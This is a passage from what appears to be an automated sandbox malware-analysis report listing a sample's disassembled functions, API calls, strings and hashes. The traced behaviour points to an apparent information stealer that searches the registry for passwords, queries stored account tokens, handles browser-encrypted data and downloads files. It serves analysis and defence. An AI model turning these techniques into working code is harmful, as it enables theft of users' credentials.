                                                            • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                            • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                            • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                            • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                            • task.LIBCPMTD ref: 004076FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                            • String ID: :
                                                            • API String ID: 3191641157-3653984579
                                                            • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                            • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                            • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                            • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                            Function 022E1612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcpy.KERNEL32(?,?), ref: 022E1642
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                              • Part of subcall function 022E94C7: StrStrA.SHLWAPI(?,?), ref: 022E94D3
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E167E
                                                              • Part of subcall function 022E94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022E94F7
                                                              • Part of subcall function 022E94C7: lstrlen.KERNEL32(?), ref: 022E950E
                                                              • Part of subcall function 022E94C7: wsprintfA.USER32 ref: 022E952E
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E16C6
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E170E
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E1755
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E179D
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E17E5
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E182C
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 022E1874
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                            • strtok_s.MSVCRT ref: 022E19B7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                            • String ID:
                                                            • API String ID: 4276352425-0
                                                            • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                            • Instruction ID: 4158661848786d2b51a9c44eb49494a0d5e03b6db320aeb1cc2c92dc8bf085f8
                                                            • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                            • Instruction Fuzzy Hash: AE7165B5960218ABCF14EBE0DC88EEE737AAF55300F444599A10FA2144EE755B84DF61
                                                            Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00407314
                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                            • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                              • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                            • task.LIBCPMTD ref: 00407555
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                            • String ID: Password
                                                            • API String ID: 2698061284-3434357891
                                                            • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                            • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                            • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                            • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                            Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcatA.KERNEL32(?,008790D8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                            • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                            • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                            • lstrcatA.KERNEL32(?,00845E28), ref: 00414847
                                                            • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                            • lstrcatA.KERNEL32(?,00879A58), ref: 0041486F
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                              • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                              • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                              • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                              • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                            • String ID: 0aA
                                                            • API String ID: 167551676-2786531170
                                                            • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                            • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                            • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                            • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                            Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008790F0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008790F0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                            • __aulldiv.LIBCMT ref: 00418172
                                                            • __aulldiv.LIBCMT ref: 00418180
                                                            • wsprintfA.USER32 ref: 004181AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                            • String ID: %d MB$@
                                                            • API String ID: 2886426298-3474575989
                                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                            Function 022D6307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022D6376
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D63AE
                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022D63F6
                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022D641A
                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 022D6443
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022D6471
                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 022D64B0
                                                            • InternetCloseHandle.WININET(?), ref: 022D64BA
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D64C7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 4287319946-0
                                                            • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                            • Instruction ID: 587547d62c2b6e8abd2c63fb14d3436c13b1492aa1deaff21fe3c776ead07939
                                                            • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                            • Instruction Fuzzy Hash: AF517FB5A60318ABDF20DFE0DC44BEE7779AB44705F408098F605A72C4DBB46A89CF95
                                                            Function 022E4FD7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 022E4FEE
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E5017
                                                            • lstrcat.KERNEL32(?,00421000), ref: 022E5034
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                                              • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                                            • memset.MSVCRT ref: 022E507A
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E50A3
                                                            • lstrcat.KERNEL32(?,00421020), ref: 022E50C0
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                                              • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                                              • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                                            • memset.MSVCRT ref: 022E5106
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E512F
                                                            • lstrcat.KERNEL32(?,00421038), ref: 022E514C
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C17
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022E4C2C
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C49
                                                              • Part of subcall function 022E4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022E4C85
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,0064A524), ref: 022E4CB1
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022E4CC3
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CD7
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022E4CE9
                                                              • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CFD
                                                              • Part of subcall function 022E4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022E4D13
                                                              • Part of subcall function 022E4B77: DeleteFileA.KERNEL32(?), ref: 022E4D98
                                                            • memset.MSVCRT ref: 022E5192
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID:
                                                            • API String ID: 4017274736-0
                                                            • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                            • Instruction ID: db05b167b2f9cd16b0adcd5423be81d2d0db33ff3aefd49a6bcb9afd82be81d1
                                                            • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                            • Instruction Fuzzy Hash: 4741D679A5031467DB10F7F0EC46FED3739AB24701F804494B68A660C4EEB897D88F92
                                                            Function 022E8367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022E8397
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E839E
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022E83BF
                                                            • __aulldiv.LIBCMT ref: 022E83D9
                                                            • __aulldiv.LIBCMT ref: 022E83E7
                                                            • wsprintfA.USER32 ref: 022E8413
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                            • String ID: @
                                                            • API String ID: 2774356765-2766056989
                                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction ID: 2b9d2c89cc79d323a96f5a89d2ba8a7fd6ae12c1c4badfe6e585ced312a11b55
                                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                            • Instruction Fuzzy Hash: 29214AB1E54218ABDB00DFD4DC49FAEB7B9FB44B04F504609F616BB284C7B869008BA5
                                                            Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                            • API String ID: 1440504306-1079375795
                                                            • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                            • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                            • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                            • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                            Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess$DefaultLangUser
                                                            • String ID: B
                                                            • API String ID: 1494266314-2248957098
                                                            • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                            • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                            • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                            • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                            Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                            • memset.MSVCRT ref: 00409EE8
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                            • API String ID: 1977917189-1096346117
                                                            • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                            • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                            • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                            • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                            Function 022D7837 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022D7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                                              • Part of subcall function 022D7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                                              • Part of subcall function 022D7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                                              • Part of subcall function 022D7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
                                                              • Part of subcall function 022D7537: HeapFree.KERNEL32(00000000), ref: 022D76C0
                                                            • lstrcat.KERNEL32(0064A668,004217FC), ref: 022D786D
                                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78AF
                                                            • lstrcat.KERNEL32(0064A668,00421800), ref: 022D78C1
                                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78F6
                                                            • lstrcat.KERNEL32(0064A668,00421804), ref: 022D7907
                                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 022D793A
                                                            • lstrcat.KERNEL32(0064A668,00421808), ref: 022D7954
                                                            • task.LIBCPMTD ref: 022D7962
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                            • String ID:
                                                            • API String ID: 2677904052-0
                                                            • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                            • Instruction ID: cf4a7821771cdac8e22ca8d66d6d36e0a275f20a70a445ebae946f91aeec6ae1
                                                            • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                            • Instruction Fuzzy Hash: 3F314FB6A50209EFCB04EBE0DC94DFE7776EB49301F105018E106A7294DA34E942CF52
                                                            Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                            • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                            • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                            • InternetCloseHandle.WININET(?), ref: 004050C6
                                                            Memory Dump Source
